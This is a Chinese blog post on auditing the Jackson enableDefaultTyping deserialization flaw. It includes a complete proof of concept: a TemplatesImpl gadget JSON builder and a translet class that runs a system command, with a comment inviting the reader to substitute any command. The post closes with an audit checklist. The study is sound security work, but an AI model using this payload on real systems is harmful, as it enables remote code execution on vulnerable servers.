java jackson漏洞_小白审计JACKSON反序列化漏洞

最新推荐文章于 2024-06-23 09:46:24 发布
最新推荐文章于 2024-06-23 09:46:24 发布
阅读量1.5k 收藏
点赞数
文章标签: java jackson漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29100399/article/details/114187403
版权
本文详细解析了Jackson反序列化漏洞,包括POC代码展示、漏洞利用过程以及如何通过代码审计发现此类漏洞。介绍了如何通过检查Jackson库版本、Bean类中的Object类型变量及ObjectMapper的enableDefaultTyping设置来判断是否存在潜在风险。
摘要由CSDN通过智能技术生成

1. JACKSON漏洞解析

poc代码:main.java

importcom.fasterxml.jackson.databind.ObjectMapper;importcom.sun.org.apache.xerces.internal.impl.dv.util.Base64;importorg.springframework.util.FileCopyUtils;importjava.io.ByteArrayOutputStream;importjava.io.File;importjava.io.FileInputStream;importjava.io.IOException;/*** Created by Administrator on 2017/6/12.*/

public classmain {public static voidmain(String[] args) {

String MASIT_CLASS= "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";//改成exp存在的绝对路径

String exp = readClassStr("D:\\workspace\\123\\target\\classes\\exp.class");

String jsonInput= aposToQuotes("{\"object\":['com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl',\n" +

"{\n" +

"'transletBytecodes':['"+exp+"'],\n" +

"'transletName':'p',\n" +

"'outputProperties':{}\n" +

"}\n" +

"]\n" +

"}");

System.out.printf(jsonInput);

ObjectMapper mapper= newObjectMapper();

mapper.enableDefaultTyping();

User user;try{

user= mapper.readValue(jsonInput, User.class);

System.out.println(user.getSex());

System.out.println(user.getName());

}catch(Exception e) {

e.printStackTrace();

}

}public staticString aposToQuotes(String json){return json.replace("'","\"");

}public staticString readClassStr(String cls){

ByteArrayOutputStream byteArrayOutputStream= newByteArrayOutputStream();try{

FileCopyUtils.copy(new FileInputStream(newFile(cls)),byteArrayOutputStream);

}catch(IOException e) {

e.printStackTrace();

}returnBase64.encode(byteArrayOutputStream.toByteArray());

}

}

exp.java

import com.sun.javaws.progress.Progress;

import com.sun.org.apache.xalan.internal.xsltc.DOM;

import com.sun.org.apache.xalan.internal.xsltc.TransletException;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;

import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;

import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.*;

/**

* Created by Administrator on 2017/6/12.

*/

public class exp extends AbstractTranslet {

public exp() throws Exception {

try {

BufferedReader br = null;

//修改成你想要执行的命令

Process p = Runtime.getRuntime().exec("ipconfig");

br = new BufferedReader(new InputStreamReader(p.getInputStream()));

String line = null;

StringBuilder sb = new StringBuilder();

while ((line = br.readLine()) != null) {

sb.append(line + "\n");

System.out.println(sb);

}

File file = new File("result.txt");

//File file =new File("javaio-appendfile.txt");

//if file doesnt exists, then create it

if(!file.exists()){

file.createNewFile();

}

//true = append file

FileWriter fileWritter = new FileWriter(file.getName(),true);

BufferedWriter bufferWritter = new BufferedWriter(fileWritter);

bufferWritter.write(sb.toString());

bufferWritter.close();

System.out.println(sb);

} catch (IOException e) {

e.printStackTrace();

}

}

@Override

public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

}

@Override

public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

}}

user.java

importjava.io.Serializable;importjava.util.Arrays;importjava.util.InputMismatchException;importjava.util.Objects;/*** Created by Administrator on 2017/6/12.*/

public classUser {privateObject object;publicObject getObject() {returnobject;

}public voidsetObject(Object object) {this.object =object;

}

}

尝试执行:

发现result.txt中存在结果

Windows IP ����

��̫�������� ��������2:

ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�

�����ض��� DNS ��׺ . . . . . . . :

��̫�������� Npcap Loopback Adapter:

�����ض��� DNS ��׺ . . . . . . . :

�������� IPv6 ��ַ. . . . . . . . : fe80::b047:25da:330b:45d4%18�Զ����� IPv4 ��ַ . . . . . . . :169.254.69.212�������� . . . . . . . . . . . . :255.255.0.0Ĭ�����. . . . . . . . . . . . . :

��̫�������� ��������:

�����ض��� DNS ��׺ . . . . . . . :

�������� IPv6 ��ַ. . . . . . . . : fe80::fd81:27ba:8b8b:4a72%12IPv4 ��ַ . . . . . . . . . . . . :10.0.83.198�������� . . . . . . . . . . . . :255.255.255.0Ĭ�����. . . . . . . . . . . . . :10.0.83.1

调试本地代码:

由于Jackson中是通过readValue执行命令,

按F7进入当前函数:

b2e2858a6a00321433fbce04d8e5060b.png

跳过几次赋值,进入到当前函数,发现次函数中存在反序列化的赋值,按F7进行调试

f1d7de5283027fbc7cb414c57c11995d.png

经过多次调试发现,命令在标红处代码执行,并抛出异常

91bfd645df3af43582ef738c01f81b61.png

多部调试,F7进入函数代码(SetterlessProperty.java):

5eaa909581e2887a1caece68939cd2fb.png

代码执行:

8ce42dd57c57014239c0c81073df2f4b.png

2. Jackson反序列化漏洞如何审计

OK,说到这就简单介绍了下,Jackson的反序列化代码运行的过程,那么现在代码审计中如何审计的出来项目是否包含Jackson反序列化呢?

第一步:看版本,如果Jackson的版本号不在存在漏洞的版本列表中,肯定不会有此漏洞,

版本列表:

Jackson 2.7版本(<2.7.10)

Jackson 2.8版本(<2.8.9)

第二步:你的Bean类中是否包含object类型的变量:

例如,我这边的User类中的Object变量定义为:private Object object

第三步:Jackson的ObjectMapper必须调用enableDefaultTyping:

ObjectMapper mapper = new ObjectMapper();

mapper.enableDefaultTyping();

满足以上三个要求,才能进行构造POC进行校验。

小云哥哥
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java jackson漏洞_【Java进阶】Jackson安全漏洞,可导致服务器文件被恶意窃取
weixin_42322686的博客
02-16 805
上周升级完Fastjson之后,去了解了下Jackson是否也有相关的漏洞。 果不其然,看到了一个issue虽然这个issue是好几个月前的了,但是可能大家对Jackson比较不在意,以为国外的开源要牛逼一点,不会像Fastjson那么多问题,这里要纠正一点,fastjson之所以问题多,那是因为你接触的多,Jackson的问题其实也不少,只是你接触的少。 就拿这种issue的问题来说,这个漏洞...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。阿里云应急响应心提醒Jackson用户尽快采取安全措施阻止漏洞攻击。
jackson-databind远程代码执行漏洞(CVE-2020-8840)修复与测试
Quarrie的博客
05-03 3936
漏洞介绍 攻击者可以利用此漏洞通过JNDI注入的方式执行本地Web容器下的任意代码,后文将测试LDAP方式的远程代码调用,受影响版参见:NVD。 修复建议 网上能找到的大部分修复建议是将jackson-databind的版本升级到2.9.10.4或后续版本,此方法的确行之有效,但是对于使用JDK1.6的老项目就比较尴尬,因为至2.8版本后jackson-databind字节码不再兼容JDK1.6...
探索Jackson-RCE-Via-Spel:安全漏洞的警示与防护
最新发布
gitblog_00024的博客
06-23 235
探索Jackson-RCE-Via-Spel:安全漏洞的警示与防护 项目地址:https://gitcode.com/irsl/jackson-rce-via-spel 在深入理解现代Java应用的安全性时,我们必须时刻警惕潜在的风险和威胁。Jackson-databind是一个广泛使用的JSON库,它提供了一种强大的数据绑定机制,但同时也存在一个默认类型的漏洞(CVE-2017-7525),可能...
【安全漏洞jackson-databind漏洞、 异常NoClassDefFoundError: Could not initialize class com.fasterxml.jackson
热门推荐
开着奥迪卖小猪
07-25 1万+
一、jackson-databind漏洞 国家信息安全漏洞库:http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201906-867 二、发现项目有使用2.6.3版本的jackson,所以进行升级 jackson-databind 升级到2.9.9.1、 jackson...
jackson异常处理
来年三月
04-27 430
一 问题  Hive报错Java.lang.NoClassDefFoundError:  org/codehaus/jackson/JsonFactory 二 原因 Hadoop版本是0.20.2.$HADOOP_HOME/lib不包含 jackson-core-asl-1.8.8.jar jackson-jaxrs-1.8.8.jar
Jackson 反序列化漏洞原理
王嘟嘟的博客
02-28 3003
Jackson 最基础的功能就是将制定的类 序列化 to json,然后json to 序列化的这样一个工具第三方库,正常情况下因为需要执行类进行转换,所以除非是故意留有后门,否则是不会出现问题的。但是为了处理一个情况,就是处理未知的json转换的时候,需要对多种场景进行处理。于是就有了Jackson多态机制。如:需要处理多个子类的情况。那么当json的指定的类的seter或者无参构造方法存在可利用点的时候,就会造成有效的反序列化攻击。也就是需要找的反序列化调用链。
Java Web 安全】jackson漏洞探究、利用、预防
qqchaozai的专栏
08-15 4817
前言 阿里云安全公告:2019年7月31日,阿里云应急响应心监测到有安全研究人员披露Jackson最新反序列化远程代码执行漏洞(CVE-2019-14361和CVE-2019-14439)。同事说怎么jackson这类的json序列化库经常报漏洞,而且基本都是高危漏洞,这些漏洞到底怎么来的,jackson的开发程序员就这么不靠谱么?改不完的BUG?这篇文章就让我们走进jackson的世界,感受...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
JAVAJackson反序列化漏洞.docx
07-27
以CVE-2020-10673为例,这是一个针对Jackson库的反序列化漏洞,它影响了Jackson 2.9.2版本。复现该漏洞通常涉及构造特定的JSON输入,利用Jackson反序列化时的弱点,触发恶意行为。在复现过程,需要设置合适的环境...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
Java反序列化漏洞介绍书籍
08-17
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在Java应用程序反序列化是将已序列化的对象数据转换回其原始对象状态的过程。当这个过程处理不当时,恶意用户可以利用这些漏洞来执行任意代码,从而导致...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序,当接收到从网络或持久存储读取的数据,并将其转换回原来的对象实例时...
Jackson框架出现Java反序列化漏洞 2.7.10 及2.8.9以下版本受影响 绿盟科技发布防护方案...
weixin_33726318的博客
09-01 1821
Jackson可以轻松的将Java对象转换成json对象和xml文档,同样也可以将json、xml转换成Java对象,在2017年3月份,fastjson 1.2.24之前版本曾经出现过严重漏洞。而更早的时候,Java反序列化漏洞问题曾经一度让大家心惊肉跳,这次是Jackson框架 2.7.10 及2.8.9以下版本出现任意代码执行漏洞,攻击者利用该...
Jackson-databind引发的漏洞问题分析
kshzhaohui的专栏
03-25 7793
前言 最近公司内部提供了一份应用高危漏洞的清单,其提到了fastjson和jackson,因为之前对fastjson因为多态问题引发的反序列化问题有过了解,所以打算也做一个简单的分析。 漏洞简述 2020年08月27日,360CERT监测发现 jackson-databind 发布了 jackson-databind 序列化漏洞 的风险通告,该漏洞编号为 CVE-2020-24616 ,漏洞等级:高危,漏洞评分:7.5。 br.com.anteros:Anteros-DBCP 存在新的反序列化利用链,
[JAVA安全]JACKSON反序列化
snowlyzz的博客
01-28 2059
JACKSON反序列化原理
探索Jackson库的安全漏洞修复:CVE-2020-8840
gitblog_00016的博客
04-05 506
探索Jackson库的安全漏洞修复:CVE-2020-8840 项目地址:https://gitcode.com/jas502n/jackson-CVE-2020-8840 项目简介 在此GitCode仓库,开发者jas502n分享了对Jackson一个关键安全漏洞CVE-2020-8840的研究和修复过程。JacksonJava最流行的JSON处理库之一,广泛应用于Web服务、后端开发等...
Jackson安全漏洞版本升级
北辰
02-27 5939
在使用jackson来解析json数据时会使用到如下jar包 目前maven的官方仓库jackson-databind的2.8.11版本的安全版本最新为2.8.11.5且更新时间为2020年。 当使用到ObjectMapper时还需引入如下两个依赖: <dependency> <groupId>org.codehaus.jackson</grou...
Jackson 远程命令执行漏洞(CVE-2019-12384)
玄道的网安博客
06-26 8172
前言 由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序通过ObjectMapper对象调用enableDefaultTyping方法时,程序就会受到此漏洞的影响,攻击者就可利用构造的包含有恶意代码的json数据包对应用进行攻击,直接获取服务器控制权限。 影响版本 Jackson-databind 2.0.0 ~2.9.9.1 环境搭建 创建一个docker-compose.yml的文件 version: '2' services: web: image: te
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值